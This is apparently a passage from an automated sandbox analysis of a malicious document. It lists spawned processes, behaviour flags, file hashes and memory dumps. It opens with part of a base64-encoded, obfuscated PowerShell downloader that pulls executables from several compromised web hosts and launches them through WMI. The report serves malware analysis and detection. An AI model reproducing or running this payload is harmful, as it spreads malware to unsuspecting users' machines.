oAXQAnACsAJwBbACAAMQApACAAagBqACcAKwAnAGsAZwBTACAAWwBdACAAJwArACcAWwBdAHcAXQBbACAAMQApACAAJwArACcAagBqACcAKwAnAGsAZwBTACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdwB3AHcALgBlAGEAcwBlAGkAcwBlACcAKQApACsAKAAoACcAYQAnACsAJwBzAHkAJwArACcALgBjAG8AbQBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIAAnACsAJwBbACcAKwAnAF0AJwArACcAIABbACcAKwAnAF0AdwB3ACcAKwAnAHAAJwApACkAKwAoACgAJwAtAGEAZABtAGkAbgBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBxAF0AJwArACcAWwAnACsAJwAgACcAKwAnADEAKQAgACcAKwAnAGoAJwArACcAagAnACsAJwBrAGcAJwArACcAUwAnACsAJwAgACcAKwAnAFsAXQAgACcAKwAnAFsAXQB3AEAAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcABzACcAKwAnADoAJwArACcAXQBbACAAMQApACcAKwAnACAAJwArACcAagAnACsAJwBqAGsAZwBTACAAJwArACcAWwBdACAAWwBdAHcAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdQByACcAKwAnAHMAdQBwAGUAcgBzACcAKwAnAHQAYQByAC4AJwArACcAYwAnACkAKQArACgAKAAnAG8AbQBdAFsAJwArACcAIAAxACkAIAAnACsAJwBqAGoAawAnACkAKQArACgAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB3AHAALQBhACcAKwAnAGQAbQAnACsAJwBpAG4AXQBbACAAMQApACAAagAnACsAJwBqACcAKwAnAGsAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAQQBBAHgAJwArACcASwBsAGIAVgBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIAAnACsAJwBbAF0AIAAnACsAJwBbAF0AdwBAAGgAJwArACcAdAB0AHAAcwA6AF0AWwAgADEAJwArACcAKQAnACsAJwAgAGoAagBrAGcAUwAgACcAKQApACsAKAAoACcAWwAnACsAJwBdACAAWwBdAHcAXQBbACAAMQApACAAagBqAGsAZwAnACsAJwBTACcAKwAnACAAWwBdACcAKwAnACAAWwBdACcAKQApACsAKAAoACcAdwBrAHIAYQBtACcAKwAnAGUAZABhAHMALgBsAHQAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAJwArACcAWwAnACsAJwBdACAAJwArACcAWwBdAHcAdwBwAC0AJwApACkAKwAoACgAJwBhAGQAbQBpAG4AXQBbACcAKwAnACAAMQApACAAagAnACsAJwBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcARQAnACsAJwA5ACcAKwAnAEcAYwAnACsAJwBpAHkAYwBdAFsAIAAxACkAIABqAGoAawAnACsAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwBAAGgAdAB0AHAAcwA6AF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAUwAgACcAKwAnAFsAXQAgAFsAJwArACcAXQB3AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwArACcAagBrACcAKwAnAGcAUwAgAFsAXQAgAFsAXQB3ACcAKwAnAGMAcgBpACcAKQApACsAKAAnAHQAaQBjAGEAbAAtAHQAaAAnACsAJwBpAG4AawBpACcAKwAnAG4AJwArACcAZwAuACcAKQArACgAKAAnAGYAJwArACcAcgAnACsAJwBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwB3ACcAKwAnAHAALQAnACkAKQArACcAaQAnACsAKAAoACcAbgBjAGwAdQBkAGUAcwBdAFsAIAAnACsAJwAxACkAJwArACcAIAAnACkAKQArACgAJwBqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB2AEgAJwArACcAUQAnACsAJwBXAHIAZQBuAF0AWwAgADEAKQAgAGoAagBrAGcAUwAgACcAKwAnAFsAJwArACcAXQAgAFsAXQB3ACcAKQApACkAKQAuACIAUgBFAGAAUABMAEEAYABDAGUAIgAoACgAKAAoACcAXQBbACAAJwArACcAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAoACcAagBqAGsAJwArACcAZwBTACcAKwAnACAAWwBdACAAWwAnACsAJwBdACcAKQArACcAdwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAAnACsAJwB3AGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABJAHQAIgAoACQAUAB5ADAAbgAzADMAdgAgACsAIAAkAEUAagAyAHAAMQA1ADIAIAArACAAJABSADIAYgBhADcAeABhACkAOwAkAFMAXwA5AGcAaABsAG4APQAoACgAJwBUACcAKwAnAHYAMgBoACcAKQArACcAaAAnACsAJwBvAGEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGMAbgB1ADMAYQBsACAAaQBuACAAJABBAGQANAAwAGwAOABoACkAewB0AHIAeQB7ACQAWAAwADIAdgBiAGMAbgAuACIARABPAHcAbgBMAE8AYQBEAGAARgBgAGkAbABlACIAKAAkAFgAYwBuAHUAMwBhAGwALAAgACQAVABqAG0AbwA3AHkAZgApADsAJABDAHMAMgB4AG8AZQAwAD0AKAAoACcASQBmAGYAbgAnACsAJwB1ACcAKQArACcAXwBkACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAGoAbQBvADcAeQBmACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIANAA0ADMAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuADMAJwApACsAKAAnADIAJwArACcAXwBQACcAKQArACcAcgBvACcAKwAoACcAYwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBjAFIAZQBhAGAAVABFACIAKAAkAFQAagBtAG8ANwB5AGYAKQA7ACQAQwBjAGcAegByAGIAbAA9ACgAKAAnAE8AJwArACcAdwBnAGEAbwAxACcAKQArACcAawAnACkAOwBiAHIAZQBhAGsAOwAkAFYAOQBvADcAbwA3AHcAPQAoACgAJwBQADYAJwArACcAYwBmAGEAJwApACsAJwA1ADMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABRADMAZQBsADYAcwB4AD0AKAAnAEwAbQAnACsAJwA1AHMAJwArACgAJwAzACcAKwAnAG0AOQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:436

C:\Windows\SysWOW64\unlodctr\msrle32.exe
"C:\Windows\SysWOW64\unlodctr\msrle32.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
d9bc1ac9b23207e86f6a39dec105bfdb

SHA1
6909596a8164bbb718010fdf7b8cb3fbe502b0ef

SHA256
742df97bbe76b0eb341c3c9fa39d1439758bafda980d1e2bcc94a7f5ce9eb829

SHA512
0311974bed9754675bd8f19ab628a2b55210dad0f49b47871b1baea11dcdfa975ee3874bae99b47a2a8321a04d9b407b1a15442de38a29deaae5d8dd6125d710

Download Submit
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
d9bc1ac9b23207e86f6a39dec105bfdb

SHA1
6909596a8164bbb718010fdf7b8cb3fbe502b0ef

SHA256
742df97bbe76b0eb341c3c9fa39d1439758bafda980d1e2bcc94a7f5ce9eb829

SHA512
0311974bed9754675bd8f19ab628a2b55210dad0f49b47871b1baea11dcdfa975ee3874bae99b47a2a8321a04d9b407b1a15442de38a29deaae5d8dd6125d710

Download Submit
C:\Windows\SysWOW64\unlodctr\msrle32.exe
MD5
d9bc1ac9b23207e86f6a39dec105bfdb

SHA1
6909596a8164bbb718010fdf7b8cb3fbe502b0ef

SHA256
742df97bbe76b0eb341c3c9fa39d1439758bafda980d1e2bcc94a7f5ce9eb829

SHA512
0311974bed9754675bd8f19ab628a2b55210dad0f49b47871b1baea11dcdfa975ee3874bae99b47a2a8321a04d9b407b1a15442de38a29deaae5d8dd6125d710

Download Submit
memory/436-13-0x0000000001E60000-0x0000000001EA2000-memory.dmp

Filesize
264KB

Download
memory/436-12-0x0000000001E10000-0x0000000001E53000-memory.dmp

Filesize
268KB

Download
memory/540-18-0x00000000020D0000-0x0000000002112000-memory.dmp

Filesize
264KB

Download
memory/540-17-0x0000000002080000-0x00000000020C3000-memory.dmp

Filesize
268KB

Download
memory/540-15-0x0000000000000000-mapping.dmp

Download
memory/748-1-0x0000000006250000-0x0000000006254000-memory.dmp

Filesize
16KB

Download
memory/748-2-0x0000000000687000-0x000000000068B000-memory.dmp

Filesize
16KB

Download
memory/748-0-0x0000000000687000-0x000000000068B000-memory.dmp

Filesize
16KB

Download
memory/1452-5-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/1452-10-0x000000001B940000-0x000000001B941000-memory.dmp

Filesize
4KB

Download
memory/1452-9-0x0000000002860000-0x0000000002861000-memory.dmp

Filesize
4KB

Download
memory/1452-8-0x00000000023C0000-0x00000000023C1000-memory.dmp

Filesize
4KB

Download
memory/1452-7-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/1452-6-0x000000001AD90000-0x000000001AD91000-memory.dmp

Filesize
4KB

Download
memory/1452-4-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

Filesize
9.9MB

Download
memory/1500-19-0x000007FEF6AC0000-0x000007FEF6D3A000-memory.dmp

Filesize
2.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads